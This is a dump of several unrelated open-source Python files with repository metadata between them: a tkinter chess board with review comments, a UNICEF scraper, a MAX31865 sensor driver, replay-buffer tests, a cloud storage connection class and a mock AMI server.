    def __init__(self, root, pattern = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR"):
        # Same sizing rule as ChessBoard: multiple of 8, clamped to 640..1280.
        self.size = min(max(min(int(root.winfo_width()/8), int(root.winfo_height()/8)) * 8, 640), 1280)
        self.space_width = self.size / 8
        self.root = root
        tk.Canvas.__init__(self, root, height = self.size, width = self.size)
        self.pack()
        for x in range(8):
            for y in range(8):
                self.create_rectangle(x*self.space_width, y*self.space_width, (x+1)*self.space_width, (y+1)*self.space_width,
                    fill = secondary_color if (x % 2) - (y % 2) else primary_color)
                if not x:
                    self.create_text(text_margin, (y*self.space_width) + text_margin, anchor = tk.NW,
                        fill = primary_color if y % 2 else secondary_color, font = font, text = y + 1, tags = "labels")
            # NOTE(review): file letters use black/white here while ChessBoard
            # uses the board palette colors — likely an inconsistency.
            self.create_text((x + 1)*self.space_width - text_margin, 8*self.space_width - text_margin, anchor = tk.SE,
                fill = "black" if x % 2 else "white", font = font, text = chr(x + 97), tags ="labels")
        if pattern:
            self.draw_pieces(pattern)

    def draw_pieces(self, pattern):
        """Render sprite images for every piece in the placement string.

        Image references are stashed on root to keep tkinter from garbage
        collecting them.
        """
        self.root.chess_piece_images = []
        self.delete("pieces")
        x, y = 0, 0
        self.board = [[] for i in range(8)]
        for i in pattern:
            if i == "/":
                x= 0
                y += 1
                continue
            if i.isnumeric():
                # NOTE(review): same shadowed-loop-variable pattern as
                # ChessBoard.start; works because the last value is d-1.
                for i in range(int(i)):
                    self.board[y].append("")
                x += int(i) + 1
                continue
            i_val = ord(i)
            color = "b" if i_val > 97 else "w"
            i = i.lower()
            if i == "p": sprite = color + "Pawn"
            if i == "r": sprite = color + "Rook"
            if i == "n": sprite = color + "Knight"
            if i == "b": sprite = color + "Bishop"
            if i == "q": sprite = color + "Queen"
            if i == "k": sprite = color + "King"
            image = ImageTk.PhotoImage(image = Image.open(cp.sprite_names[sprite]))
            self.root.chess_piece_images.append(image)
            # Sprites are 64px; center them within the square.
            self.create_image(x * self.space_width + int((self.space_width - 64)/2),
                y * self.space_width + int((self.space_width - 64)/2), anchor = tk.NW,
                image = image, tags = "pieces")
            # NOTE(review): unlike ChessBoard.start, no entry is appended to
            # self.board for pieces, so board rows are short and get_board()
            # would fail/misreport — confirm.
            x += 1

    def get_board(self):
        """Serialize self.board back into a FEN-like string, assuming entries
        are sprite-name strings like "wKnight".

        NOTE(review): shares ChessBoard.get_board's bug — the empty-square
        count is never flushed before piece letters or reset within a row.
        """
        board = ""
        for y in range(8):
            count = 0
            for x in range(8):
                if not self.board[y][x]:
                    count += 1
                    continue
                else:
                    if self.board[y][x][1:] == "Knight":
                        new_letter = "n"
                    else:
                        new_letter = self.board[y][x][1].lower()
                    if self.board[y][x][0] == "w":
                        new_letter = new_letter.upper()
                    board = board + new_letter
            if count != 0: board = board + str(count)
            board = board + "/"
        return board
| 40.085616
| 156
| 0.491756
|
4a0eb623c105211327ae6c8a18838b2b9fb0ca0b
| 3,950
|
py
|
Python
|
unicef.py
|
timofonic-otherdevstuff/dap-scrapers
|
7b98ec546e5dcf56b82236f36db04c68743cc5ae
|
[
"Unlicense"
] | 3
|
2015-03-30T08:53:41.000Z
|
2017-05-05T13:37:08.000Z
|
unicef.py
|
timofonic-otherdevstuff/dap-scrapers
|
7b98ec546e5dcf56b82236f36db04c68743cc5ae
|
[
"Unlicense"
] | 2
|
2016-03-31T17:26:37.000Z
|
2016-03-31T17:28:15.000Z
|
unicef.py
|
OCHA-DAP/dap-scrapers
|
3beb34acfe5bf5f2fd7d2a15857264a1e65bcf08
|
[
"Unlicense"
] | 2
|
2016-03-31T17:02:03.000Z
|
2018-03-12T14:13:27.000Z
|
import logging
import dl
import messytables
import xypath
import re
import orm
import requests
import lxml.html
"""Value: dsID, region, indID, period, value, source, is_number
DataSet: dsID, last_updated, last_scraped, name
Indicator: indID, name, units
"""
# Module logger: WARN and above, echoed to stderr and appended to unicef.log.
log = logging.getLogger("unicef")
log.addHandler(logging.StreamHandler())
log.addHandler(logging.FileHandler("unicef.log"))
log.level = logging.WARN
# DataSet row describing this scraper run (schema documented above).
dataset = {"dsID": "unicef-infobycountry",
           "last_updated": None,
           "last_scraped": orm.now(),
           "name": "UNICEF info by country"
           }
# Defaults merged into every Value row saved by getstats().
value_template = {"dsID": "unicef-infobycountry",
                  "is_number": True}
def split_ind(indtext):
    """Split a UNICEF indicator label into name, period and units.

    >>> split_ind("Crude death rate, 1970")
    {'units': '', 'indID': 'Crude death rate', 'period': '1970'}
    >>> split_ind("Public spending as a % of GDP (2007-2010*) allocated to: military")
    {'units': '', 'indID': 'Public spending as a % of GDP allocated to: military', 'period': '2007/2010'}
    >>> split_ind("Population (thousands) 2011, total")
    {'units': 'thousands', 'indID': 'Population , total', 'period': '2011'}

    Strategy:
    1) extract the 4-digit year(s) as the period
    2) extract bracketed text as the units
    3) the rest is the indicator name
    """
    indtext = indtext.replace("*", "")  # drop footnote markers
    match = re.search(r"(.*?)(\d\d\d\d)-?(\d\d\d\d)?(.*)", indtext)
    if match is None:
        # No 4-digit year present.  The old code wrapped .groups() in a
        # bare except, which also hid unrelated errors; test explicitly.
        print("Couldn't parse %r" % indtext)
        return {'indID': indtext, 'period': '', 'units': ''}
    start, y1, y2, end = match.groups()
    if y2:
        period = '/'.join((y1, y2))  # year range, e.g. "2007/2010"
    else:
        period = y1
    rest = start + end
    unit_search = re.search(r"(.*)\((.*)\)(.*)", rest)
    if unit_search:
        preunit, unit, postunit = unit_search.groups()
        ind = preunit.strip() + " " + postunit.strip()
    else:
        unit = ''
        ind = rest
    ind = ind.strip(" ,")
    return {'indID': ind, 'period': period, 'units': unit}
def getstats(url, country="PLACEHOLDER"):
    """Scrape one country statistics page and save indicator values.

    Downloads `url`, finds tables whose first column mentions "EPI",
    splits each indicator label with split_ind() and persists one
    Indicator and one Value row per indicator via the orm module.
    Prints a warning when the page did not yield exactly one save.
    """
    handle = dl.grab(url)
    mts = messytables.any.any_tableset(handle)
    saves = 0
    for mt in mts.tables:
        table = xypath.Table.from_messy(mt)
        # Indicator labels live in the leftmost column (b.x == 0).
        inds = table.filter(lambda b: b.x == 0 and "EPI" in b.value)
        if not inds:
            continue
        assert len(inds) == 1
        # The "to the top" cell anchors the value column; junction()
        # intersects the indicator row with that column.
        top, = table.filter(lambda b: 'to the top' in b.value)
        value, = inds.junction(top)
        for ind in inds:
            split = split_ind(ind.value)
            values_tosave = dict(value_template)
            values_tosave['source'] = url
            values_tosave['region'] = country
            values_tosave['value'] = value[2].value
            indicator = {'indID': split['indID'],
                         'name': split['indID'],
                         'units': split['units']}
            orm.Indicator(**indicator).save()
            values_tosave['indID'] = split['indID']
            orm.Value(**values_tosave).save()
            saves = saves + 1
    if saves != 1:
        print "huh, %d saves for %r" % (saves, url)
def countrylist():
    """Yield (statistics_url, country_name) for every country page.

    Crawls the UNICEF info-by-country index, follows each country link
    and yields the href of its "Statistics" link; countries without one
    are logged and skipped.
    """
    baseurl = 'http://www.unicef.org/infobycountry'
    html = requests.get(baseurl).content
    root = lxml.html.fromstring(html)
    root.make_links_absolute(baseurl)
    mostcountries = root.xpath("//div[@class='contentrow' or @class='contentrow_last']//a")
    for country in mostcountries:
        url = country.attrib['href']
        # Bug fix: the old test was "'bvi.html' in country", which asked
        # the lxml *element* for membership (always false) instead of
        # checking the link target.
        if 'bvi.html' in url:
            continue
        html = requests.get(url).content
        root = lxml.html.fromstring(html)
        root.make_links_absolute(baseurl)
        try:
            link, = root.xpath('//a[normalize-space(text())="Statistics"]/@href')
        except ValueError:
            # xpath returned zero (or several) matches, so the
            # one-element unpack failed.  Was a bare except.
            log.warn("No stats found for %r" % url)
            continue
        yield link, country.text_content()
if __name__ == "__main__":
    # Record the scrape run, then save stats for every country found.
    orm.DataSet(**dataset).save()
    for link, country in countrylist():
        print repr([link, country])
        getstats(link, country)
| 32.113821
| 105
| 0.575443
|
4a0eb676ac88a24aad4083abd15fffa61a4cbe13
| 7,108
|
py
|
Python
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2018-02-22T13:34:34.000Z
|
2021-02-02T21:28:30.000Z
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2019-05-16T00:10:17.000Z
|
2020-10-05T17:27:17.000Z
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2019-07-09T19:19:24.000Z
|
2021-06-20T13:04:25.000Z
|
#!/usr/bin/python
#The MIT License (MIT)
#
#Copyright (c) 2015 Stephen P. Smith
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time, math
import RPi.GPIO as GPIO
#import numpy
class max31865(object):
    """Read temperature from a MAX31865 RTD-to-digital converter using
    bit-banged SPI on Raspberry Pi GPIO pins.  Any pins can be used.

    calcPT100Temp solves the Callendar-Van Dusen equation with the
    quadratic formula (ignoring the 3rd/4th-degree terms, which only
    matter below 0 degC); below zero it falls back to the straight-line
    approximation.  Numpy could solve the full polynomial but slows the
    reading down, so those lines are left commented out.
    """

    def __init__(self, csPin=8, misoPin=9, mosiPin=10, clkPin=11):
        # BCM pin numbers for the software-SPI lines.
        self.csPin = csPin
        self.misoPin = misoPin
        self.mosiPin = mosiPin
        self.clkPin = clkPin
        self.setupGPIO()

    def setupGPIO(self):
        """Configure the four SPI pins and park them in their idle state."""
        GPIO.setwarnings(False)
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(self.csPin, GPIO.OUT)
        GPIO.setup(self.misoPin, GPIO.IN)
        GPIO.setup(self.mosiPin, GPIO.OUT)
        GPIO.setup(self.clkPin, GPIO.OUT)
        GPIO.output(self.csPin, GPIO.HIGH)  # chip-select is active-low
        GPIO.output(self.clkPin, GPIO.LOW)
        GPIO.output(self.mosiPin, GPIO.LOW)

    def readTemp(self):
        """Trigger a one-shot conversion and return the temperature (degC).

        Raises FaultError when the status register reports a fault.
        """
        # Config register value 0xB2:
        #   bit 7: Vbias -> 1 (ON)
        #   bit 6: conversion mode -> 0 (manual)
        #   bit 5: 1-shot -> 1 (ON)
        #   bit 4: 3-wire select -> 1 (3-wire config)
        #   bits 3-2: fault detection cycle -> 0 (none)
        #   bit 1: fault status clear -> 1 (clear any fault)
        #   bit 0: 50/60 Hz filter select -> 0 (60 Hz)
        # (0xD2 would select continuous auto conversion at 60 Hz.)
        self.writeRegister(0, 0xB2)

        # Conversion time is less than 100 ms.
        time.sleep(.1)

        # Read all 8 registers in one burst.
        out = self.readRegisters(0, 8)

        conf_reg = out[0]
        # print("config register byte: %x" % conf_reg)

        [rtd_msb, rtd_lsb] = [out[1], out[2]]
        rtd_ADC_Code = ((rtd_msb << 8) | rtd_lsb) >> 1  # 15-bit ADC code
        temp_C = self.calcPT100Temp(rtd_ADC_Code)

        [hft_msb, hft_lsb] = [out[3], out[4]]
        hft = ((hft_msb << 8) | hft_lsb) >> 1
        # print("high fault threshold: %d" % hft)

        [lft_msb, lft_lsb] = [out[5], out[6]]
        lft = ((lft_msb << 8) | lft_lsb) >> 1
        # print("low fault threshold: %d" % lft)

        # Status register bits (a 10 Mohm resistor on the breakout board
        # helps detect cable faults):
        #   bit 7: RTD high threshold / cable fault open
        #   bit 6: RTD low threshold / cable fault short
        #   bit 2: overvoltage / undervoltage fault
        # Bug fix: the old code compared e.g. (status & 0x80) == 1, which
        # can never be true (the masked value is 0x80), so faults were
        # silently ignored.  Test the masked bit for truthiness instead.
        status = out[7]
        if status & 0x80:
            raise FaultError("High threshold limit (Cable fault/open)")
        if status & 0x40:
            raise FaultError("Low threshold limit (Cable fault/short)")
        if status & 0x04:
            raise FaultError("Overvoltage or Undervoltage Error")

        return temp_C

    def writeRegister(self, regNum, dataByte):
        """Write one byte to register regNum."""
        GPIO.output(self.csPin, GPIO.LOW)
        # 0x8x means 'write register value'.
        addressByte = 0x80 | regNum
        self.sendByte(addressByte)  # address byte first ...
        self.sendByte(dataByte)     # ... then the data byte
        GPIO.output(self.csPin, GPIO.HIGH)

    def readRegisters(self, regNumStart, numRegisters):
        """Burst-read numRegisters bytes starting at register regNumStart."""
        out = []
        GPIO.output(self.csPin, GPIO.LOW)
        # 0x0x means 'read register value'.
        self.sendByte(regNumStart)
        for byte in range(numRegisters):
            data = self.recvByte()
            out.append(data)
        GPIO.output(self.csPin, GPIO.HIGH)
        return out

    def sendByte(self, byte):
        """Clock one byte out on MOSI, MSB first."""
        for bit in range(8):
            GPIO.output(self.clkPin, GPIO.HIGH)
            if byte & 0x80:
                GPIO.output(self.mosiPin, GPIO.HIGH)
            else:
                GPIO.output(self.mosiPin, GPIO.LOW)
            byte <<= 1
            GPIO.output(self.clkPin, GPIO.LOW)

    def recvByte(self):
        """Clock one byte in from MISO, MSB first."""
        byte = 0x00
        for bit in range(8):
            GPIO.output(self.clkPin, GPIO.HIGH)
            byte <<= 1
            if GPIO.input(self.misoPin):
                byte |= 0x1
            GPIO.output(self.clkPin, GPIO.LOW)
        return byte

    def calcPT100Temp(self, RTD_ADC_Code):
        """Convert a raw 15-bit ADC code to degC for a PT100 element.

        Uses the quadratic solution of the Callendar-Van Dusen equation
        for T >= 0 and the straight-line approximation below zero
        (which should never be reached in this application).
        """
        R_REF = 430.0  # reference resistor on the breakout board
        Res0 = 100.0   # PT100 resistance at 0 degC
        a = .00390830
        b = -.000000577500
        # c = -4.18301e-12 for -200 <= T <= 0 degC; c = 0 for 0 <= T <= 850.
        c = -0.00000000000418301
        # print("RTD ADC Code: %d" % RTD_ADC_Code)
        Res_RTD = (RTD_ADC_Code * R_REF) / 32768.0  # PT100 resistance
        # print("PT100 Resistance: %f ohms" % Res_RTD)

        # Callendar-Van Dusen equation:
        #   Res_RTD = Res0 * (1 + a*T + b*T**2 + c*(T-100)*T**3)
        # With c = 0 this is quadratic in T, solved here with the
        # quadratic formula (valid for 0 <= T <= 850 degC).
        temp_C = -(a*Res0) + math.sqrt(a*a*Res0*Res0 - 4*(b*Res0)*(Res0 - Res_RTD))
        temp_C = temp_C / (2*(b*Res0))
        temp_C_line = (RTD_ADC_Code/32.0) - 256.0
        # numpy.roots would solve the full quartic but is much slower:
        # temp_C_numpy = numpy.roots([c*Res0, -c*Res0*100, b*Res0, a*Res0, (Res0 - Res_RTD)])
        # temp_C_numpy = abs(temp_C_numpy[-1])
        # print("Straight Line Approx. Temp: %f degC" % temp_C_line)
        # print("Callendar-Van Dusen Temp (degC > 0): %f degC" % temp_C)
        if temp_C < 0:
            # Below 0 degC the quadratic (c = 0) form is invalid; use the
            # straight-line approximation instead.
            temp_C = temp_C_line
        return temp_C
class FaultError(Exception):
    """Raised when the MAX31865 status register reports a fault."""
    pass
if __name__ == "__main__":
    # Demo loop: print the temperature ten times a second until Ctrl-C.
    try:
        csPin = 5
        misoPin = 19
        mosiPin = 20
        clkPin = 21
        # Renamed from 'max', which shadowed the builtin max().
        sensor = max31865(csPin, misoPin, mosiPin, clkPin)
        while True:
            tempC = sensor.readTemp()
            print(tempC)
            time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    GPIO.cleanup()
| 31.874439
| 86
| 0.677124
|
4a0eb6a3fb27045cd9bd9845892dbe62323443f4
| 349
|
py
|
Python
|
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
# This module contains some code copied from unittest2/ and other code
# developed in reference to unittest2.
# unittest2 is Copyright (c) 2001-2010 Python Software Foundation; All
# Rights Reserved. See: http://docs.python.org/license.html
# Marks this module as test-framework internals so unittest hides its
# frames from failure tracebacks.
__unittest = True


class TestNotFoundError(Exception):
    """Raised when a named test cannot be found"""
| 31.727273
| 70
| 0.765043
|
4a0eb7746a05dd11f90420db3ea0731624e6011c
| 897
|
py
|
Python
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 95
|
2015-10-10T05:12:50.000Z
|
2022-02-28T15:20:48.000Z
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 40
|
2016-04-12T16:49:07.000Z
|
2022-02-09T01:00:17.000Z
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 63
|
2016-04-12T15:29:09.000Z
|
2022-02-24T12:19:50.000Z
|
import socket
import threading
from rx import Observable
class AMIMock(object):
    """Minimal mock Asterisk AMI server for unit tests.

    Binds an ephemeral TCP port and greets every connecting client with
    an AMI banner line, accepting clients on a daemon thread via an Rx
    observable.
    """

    thread = None  # background accept thread, created by start()

    def __init__(self):
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def start(self):
        """Bind an ephemeral port, start serving, return (host, port)."""
        self.socket.bind((socket.gethostname(), 0,))
        self.thread = threading.Thread(target=self.run)
        self.thread.daemon = True
        self.thread.start()
        return self.socket.getsockname()

    def run(self):
        """Accept clients until the listening socket is closed."""
        self.socket.listen(5)

        def clients_iter():
            try:
                while True:
                    yield self.socket.accept()
            except socket.error:
                # accept() raises once stop() closes the socket; that is
                # our shutdown signal.  (Was a bare except, which also
                # swallowed KeyboardInterrupt and programming errors.)
                pass

        def send_start(c):
            # c is the (conn, address) pair from accept().
            return c[0].send(b'Asterisk Call Manager/6.6.6\r\n\r\n')

        Observable.from_(clients_iter()) \
            .subscribe(send_start)

    def stop(self):
        """Close the listening socket and reap the accept thread."""
        self.socket.close()
        self.thread.join(1)
| 23
| 71
| 0.571906
|
4a0eb9235b83ad1387a1fd981f09a9fd2013a3a5
| 7,152
|
py
|
Python
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 16
|
2019-07-01T10:56:26.000Z
|
2021-01-31T18:56:56.000Z
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 10
|
2019-03-10T21:56:10.000Z
|
2020-09-06T21:49:55.000Z
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 5
|
2019-08-02T22:11:19.000Z
|
2020-04-19T20:18:38.000Z
|
import gym
import numpy as np
from .experience_replay import ExperienceReplayBuffer
class MockEnv:
    # Minimal stand-in for a gym environment: exposes only the two
    # attributes ExperienceReplayBuffer reads in these tests.
    action_space = gym.spaces.Discrete(7)

    def __init__(self, num_frames):
        self.num_frames = num_frames
class TestExperienceReplayBuffer:
    """Tests for ExperienceReplayBuffer using a 7-step synthetic episode."""

    # One episode: states 0..6 (as column vectors), actions/rewards equal
    # to the state index, done flag set only on the final step.
    N = 7
    S = np.expand_dims(np.arange(N), axis=1)
    A = S[:, 0] % 100
    R = S[:, 0]
    D = np.zeros(N, dtype='bool')
    D[-1] = True
    EPISODE = list(zip(S, A, R, D))

    def test_add(self):
        """Filling the buffer tracks length, episode ids, done flags and
        wraps around once capacity (17) is exceeded."""
        buffer = ExperienceReplayBuffer(MockEnv(1), capacity=17)

        for i, (s, a, r, done) in enumerate(self.EPISODE, 1):
            buffer.add(s + 100, a, r + 100, done, episode_id=1)
            assert len(buffer) == max(0, i - buffer.bootstrap_n)

        np.testing.assert_array_equal(
            buffer._e[:7],
            [1, 1, 1, 1, 1, 1, 1])
        np.testing.assert_array_equal(
            buffer._d[:7].astype('int'),
            [0, 0, 0, 0, 0, 0, 1])

        for i, (s, a, r, done) in enumerate(self.EPISODE, i + 1):
            buffer.add(s + 200, a, r + 200, done, episode_id=2)
            assert len(buffer) == max(0, i - buffer.bootstrap_n)

        np.testing.assert_array_equal(
            buffer._e[:14],
            [1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2])
        np.testing.assert_array_equal(
            buffer._d[:14].astype('int'),
            [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1])

        for i, (s, a, r, done) in enumerate(self.EPISODE, i + 1):
            buffer.add(s + 300, a, r + 300, done, episode_id=3)
            assert len(buffer) == np.clip(i - buffer.bootstrap_n, 0, 17)

        # buffer wraps around and overwrites oldest transitions
        np.testing.assert_array_equal(
            buffer._e,
            [3, 3, 3, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
        np.testing.assert_array_equal(
            buffer._d.astype('int'),
            [0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
        np.testing.assert_array_equal(
            buffer._a,
            [
                [0, 0, 0, 0, 1, 0, 0],  # a=4
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [0, 0, 0, 1, 0, 0, 0],  # a=3
                [0, 0, 0, 0, 1, 0, 0],  # a=4
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [1, 0, 0, 0, 0, 0, 0],  # a=0
                [0, 1, 0, 0, 0, 0, 0],  # a=1
                [0, 0, 1, 0, 0, 0, 0],  # a=2
                [0, 0, 0, 1, 0, 0, 0],  # a=3
                [0, 0, 0, 0, 1, 0, 0],  # a=4
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [1, 0, 0, 0, 0, 0, 0],  # a=0
                [0, 1, 0, 0, 0, 0, 0],  # a=1
                [0, 0, 1, 0, 0, 0, 0],  # a=2
                [0, 0, 0, 1, 0, 0, 0],  # a=3
            ])

    def test_sample(self):
        """Sampled transitions match the expected (seeded) batch and keep
        states/actions aligned bootstrap_n steps apart."""
        buffer = ExperienceReplayBuffer(
            env=MockEnv(num_frames=4), capacity=17, random_seed=7,
            batch_size=16, bootstrap_n=2)

        for ep in (1, 2, 3):
            for s, a, r, done in self.EPISODE:
                buffer.add(
                    s[[0, 0, 0, 0]] + ep * 100, a, r + ep * 100, done,
                    episode_id=ep)

        # quickly check content, just to be safe
        np.testing.assert_array_equal(
            buffer._a,
            [
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [0, 0, 1, 0, 0, 0, 0],  # a=2
                [0, 0, 0, 1, 0, 0, 0],  # a=3
                [0, 0, 0, 0, 1, 0, 0],  # a=4
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [1, 0, 0, 0, 0, 0, 0],  # a=0
                [0, 1, 0, 0, 0, 0, 0],  # a=1
                [0, 0, 1, 0, 0, 0, 0],  # a=2
                [0, 0, 0, 1, 0, 0, 0],  # a=3
                [0, 0, 0, 0, 1, 0, 0],  # a=4
                [0, 0, 0, 0, 0, 1, 0],  # a=5
                [0, 0, 0, 0, 0, 0, 1],  # a=6
                [1, 0, 0, 0, 0, 0, 0],  # a=0
                [0, 1, 0, 0, 0, 0, 0],  # a=1
                [0, 0, 1, 0, 0, 0, 0],  # a=2
                [0, 0, 0, 1, 0, 0, 0],  # a=3
                [0, 0, 0, 0, 1, 0, 0],  # a=4
            ])

        # Each entry: [first-frame pixels of S, discount In, pixels of
        # S_next]; In == 0.0 marks transitions without a bootstrap value.
        transitions = [
            [[300, 300, 300, 301], 0.9801, [300, 301, 302, 303]],  # fill
            [[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]],  # fill both
            [[300, 300, 300, 300], 0.9801, [300, 300, 301, 302]],  # fill both
            [[200, 200, 200, 201], 0.9801, [200, 201, 202, 203]],  # fill
            [[300, 300, 300, 300], 0.9801, [300, 300, 301, 302]],  # fill both
            [[200, 201, 202, 203], 0.9801, [202, 203, 204, 205]],  # normal
            [[200, 200, 200, 201], 0.9801, [200, 201, 202, 203]],  # fill
            [[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]],  # fill both
            [[103, 104, 105, 106], 0.0000, [105, 106, 200, 201]],  # no bootst.
            [[300, 300, 301, 302], 0.9801, [301, 302, 303, 304]],  # fill
            [[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]],  # fill both
            [[202, 203, 204, 205], 0.0000, [204, 205, 206, 300]],  # no bootst.
            [[302, 303, 304, 305], 0.0000, [304, 305, 306, 102]],  # no bootst.
            [[201, 202, 203, 204], 0.9801, [203, 204, 205, 206]],  # normal
            [[103, 104, 105, 106], 0.0000, [105, 106, 200, 201]],  # no bootst.
            [[202, 203, 204, 205], 0.0000, [204, 205, 206, 300]]]  # no bootst.

        S, A, Rn, In, S_next, A_next = buffer.sample()
        np.testing.assert_array_equal(In, [tr[1] for tr in transitions])
        np.testing.assert_array_equal(
            S[:, 0, :], [tr[0] for tr in transitions])
        np.testing.assert_array_equal(
            S_next[:, 0, :], [tr[2] for tr in transitions])

        # check if actions are separate by bootstrap_n steps
        for a, i_next, a_next in zip(A, In, A_next):
            if i_next != 0:
                assert np.argmax(a_next) - np.argmax(a) == buffer.bootstrap_n

        # check if states and actions are aligned
        np.testing.assert_array_equal(S[:, 0, -1] % 100, np.argmax(A, axis=1))
        np.testing.assert_array_equal(
            S_next[:, 0, -1] % 100, np.argmax(A_next, axis=1))

    def test_shape(self):
        """Sampled batches keep the (batch, height, width, frames) shape
        and stack frames only from within a single episode."""
        buffer = ExperienceReplayBuffer(
            env=MockEnv(num_frames=3), capacity=17, batch_size=5,
            random_seed=5)

        for ep in (1, 2, 3):
            for i, (_, a, r, done) in enumerate(self.EPISODE):
                s = 100 * ep + i * np.ones((11, 13, 3), dtype='int')
                buffer.add(s, a, r, done, ep)

        S, A, Rn, In, S_next, A_next = buffer.sample()
        assert S.shape == (5, 11, 13, 3)

        # check if all frames come from the same episode
        np.testing.assert_array_equal(
            S[:, 0, 0, :],  # look at upper-left pixel only
            [[300, 300, 300],  # note: first frame is repeated twice
             [300, 300, 301],  # note: first frame is repeated once
             [104, 105, 106],
             [300, 301, 302],
             [200, 201, 202]])
| 41.34104
| 79
| 0.434424
|
4a0eb98c3b045c51a23ea5f312d0adb7398ad66b
| 1,138
|
py
|
Python
|
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create / interact with gcloud storage connections."""
from gcloud import connection as base_connection
class Connection(base_connection.JSONConnection):
    """A connection to Google Cloud Storage via the JSON REST API.

    Request plumbing is inherited from base_connection.JSONConnection;
    this class only pins the storage-specific URL constants below.
    """

    API_BASE_URL = base_connection.API_BASE_URL
    """The base of the API call URL."""

    API_VERSION = 'v1'
    """The version of the API, used in building the API call's URL."""

    API_URL_TEMPLATE = '{api_base_url}/storage/{api_version}{path}'
    """A template for the URL of a particular API call."""
| 36.709677
| 74
| 0.738137
|
4a0eba4fec6079e53666851d4808dfb4a22d7e37
| 356
|
py
|
Python
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 3
|
2018-03-19T07:57:10.000Z
|
2021-07-05T08:55:14.000Z
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 6
|
